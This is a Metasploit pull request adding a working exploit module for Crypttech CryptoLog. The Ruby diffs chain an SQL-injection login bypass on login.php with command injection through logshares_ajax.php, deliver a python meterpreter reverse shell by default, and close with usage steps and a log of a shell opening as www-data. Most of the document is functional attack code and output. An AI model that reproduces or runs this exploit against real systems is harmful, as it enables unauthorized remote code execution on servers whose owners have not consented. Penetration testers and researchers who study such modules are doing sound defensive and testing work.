### PR TITLE
Add module Crypttech CryptoLog Remote Code Execution

### DIFF
--- a/modules/exploits/linux/http/cryptolog_exec.rb
+++ b/modules/exploits/linux/http/cryptolog_exec.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         login.php endpoint is responsible for login process. One of the user supplied parameter is used by the application without input validation
         and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session.
 
-        logshares_ajax.php endpoint is repsonsible for executing a operation system command. It's not possible to access this endpoint without having
+        logshares_ajax.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having
         a valid session. One user parameter is used by the application while executing operating system command which cause a command injection issue.
 
         Combining these vulnerabilities gives us opportunity execute operation system command under the context of the web user.
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'act' => 'login'
       },
       'vars_post' => {
-        'user' => "#{r}' OR #{i}=#{i}-- #{r}",
+        'user' => "' OR #{i}=#{i}#",
         'pass' => "#{r}"
       }
     })

--- a/modules/exploits/linux/http/cryptolog_exec.rb
+++ b/modules/exploits/linux/http/cryptolog_exec.rb
@@ -1,0 +1,119 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "CryptoLOG Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the sql injection and command injection vulnerability of CryptoLog. An un-authenticated user can execute a
+        terminal command under the context of the web user.
+
+        login.php endpoint is responsible for login process. One of the user supplied parameter is used by the application without input validation
+        and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session.
+
+        logshares_ajax.php endpoint is repsonsible for executing a operation system command. It's not possible to access this endpoint without having
+        a valid session. One user parameter is used by the application while executing operating system command which cause a command injection vulnerability
+
+        Combining these vulnerabilities gives us opportunity execute operation system with web user privilege.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/']
+        ],
+      'DefaultOptions'  =>
+        {
+          'Payload'  => 'python/meterpreter/reverse_tcp'
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [[ 'Automatic', { }]],
+      'Privileged'     => false,
+      'DisclosureDate' => "May 3 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable CryptoLog instance', '/'])
+      ], self.class)
+  end
+
+  def check
+    r = rand_text_alpha(15)
+    i = rand_text_numeric(5)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
+      'vars_get' => {
+        'act' => 'login'
+      },
+        'vars_post' => {
+        'user' => "#{r}' OR #{i}=#{i}-- #{r}",
+        'pass' => "#{r}"
+      }
+    })
+    
+    if res && res.code == 302 && res.headers.include?('Set-Cookie')
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("Bypassing login by exploiting SQLi flaw")
+
+    r = rand_text_alpha(15)
+    i = rand_text_numeric(5)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
+      'vars_get' => {
+        'act' => 'login'
+      },
+      'vars_post' => {
+        'user' => "#{r}' OR #{i}=#{i}-- #{r}",
+        'pass' => "#{r}"
+      }
+    })
+
+    if res && res.code == 302 && res.headers.include?('Set-Cookie')
+      cookie = res.get_cookies
+      print_good("Successfully logged in")
+    else
+      fail_with(Failure::Unknown, "Something went wrong.")
+    end
+
+    print_status("Exploiting command injection flaw")
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'cryptolog', 'logshares_ajax.php'),
+      'cookie'    => cookie,
+      'vars_post' => {
+        'opt' => "check",
+        'lsid' => "$(python -c \"#{payload.encoded}\")",
+        'lssharetype' => "#{r}"
+      }
+    })
+
+  end
+end

--- a/modules/exploits/linux/http/cryptolog_exec.rb
+++ b/modules/exploits/linux/http/cryptolog_exec.rb
@@ -3,13 +3,10 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::SSH
 
   def initialize(info={})
     super(update_info(info,
@@ -22,9 +19,9 @@ class MetasploitModule < Msf::Exploit::Remote
         and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session.
 
         logshares_ajax.php endpoint is repsonsible for executing a operation system command. It's not possible to access this endpoint without having
-        a valid session. One user parameter is used by the application while executing operating system command which cause a command injection vulnerability
+        a valid session. One user parameter is used by the application while executing operating system command which cause a command injection issue.
 
-        Combining these vulnerabilities gives us opportunity execute operation system with web user privilege.
+        Combining these vulnerabilities gives us opportunity execute operation system command under the context of the web user.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -51,7 +48,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(80),
         OptString.new('TARGETURI', [true, 'The URI of the vulnerable CryptoLog instance', '/'])
-      ], self.class)
+      ]
+    )
   end
 
   def check
@@ -69,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'pass' => "#{r}"
       }
     })
-    
+
     if res && res.code == 302 && res.headers.include?('Set-Cookie')
       Exploit::CheckCode::Appears
     else

--- a/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
+++ b/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
@@ -52,32 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def check
-    r = rand_text_alpha(15)
-    i = rand_text_numeric(5)
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
-      'vars_get' => {
-        'act' => 'login'
-      },
-        'vars_post' => {
-        'user' => "#{r}' OR #{i}=#{i}-- #{r}",
-        'pass' => "#{r}"
-      }
-    })
-
-    if res && res.code == 302 && res.headers.include?('Set-Cookie')
-      Exploit::CheckCode::Appears
-    else
-      Exploit::CheckCode::Safe
-    end
-  end
-
-  def exploit
-    print_status("Bypassing login by exploiting SQLi flaw")
-
+  def bypass_login
     r = rand_text_alpha(15)
     i = rand_text_numeric(5)
 
@@ -94,13 +69,33 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res && res.code == 302 && res.headers.include?('Set-Cookie')
-      cookie = res.get_cookies
-      print_good("Successfully logged in")
+      res.get_cookies
     else
+      nil
+    end
+  end
+
+  def check
+    if bypass_login.nil?
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Appears
+    end
+  end
+
+  def exploit
+    print_status("Bypassing login by exploiting SQLi flaw")
+
+    cookie = bypass_login
+
+    if cookie.nil?
       fail_with(Failure::Unknown, "Something went wrong.")
     end
+    
+    print_good("Successfully logged in")
 
     print_status("Exploiting command injection flaw")
+    r = rand_text_alpha(15)
 
     send_request_cgi({
       'method' => 'POST',

--- a/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
+++ b/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "CryptoLOG Remote Code Execution",
+      'Name'           => "Crypttech CryptoLog Remote Code Execution",
       'Description'    => %q{
         This module exploits the sql injection and command injection vulnerability of CryptoLog. An un-authenticated user can execute a
         terminal command under the context of the web user.

--- a/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
+++ b/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if cookie.nil?
       fail_with(Failure::Unknown, "Something went wrong.")
     end
-    
+
     print_good("Successfully logged in")
 
     print_status("Exploiting command injection flaw")


### PR DESCRIPTION
This module exploits the sql injection and command injection vulnerability of CryptoLog. An un-authenticated user can execute a terminal command under the context of the web user.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploits/linux/http/cryptolog_exec.rb`
- [ ] `set RHOST <YOUR_TARGET>`
- [ ] `python/meterpreter/reverse_tcp` is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type. 
- [ ] `set LHOST <LOCAL IP>`
- [ ] `exploit` and then **verify** the following output.

```
msf exploit(cryptolog) > exploit 

[*] Started reverse TCP handler on 12.0.0.3:4444 
[*] Bypassing login by exploiting SQLi flaw
[+] Successfully logged in
[*] Exploiting command injection flaw
[*] Sending stage (39832 bytes) to 12.0.0.45
[*] Meterpreter session 3 opened (12.0.0.3:4444 -> 12.0.0.45:51991) at 2017-05-02 18:04:52 -0400

meterpreter > getuid
Server username: www-data
meterpreter > pwd
/var/www/cryptolog
meterpreter >
```

It's not possible to download free trial of this product. Where can I send pcap file that I've recorded during exploitation ? 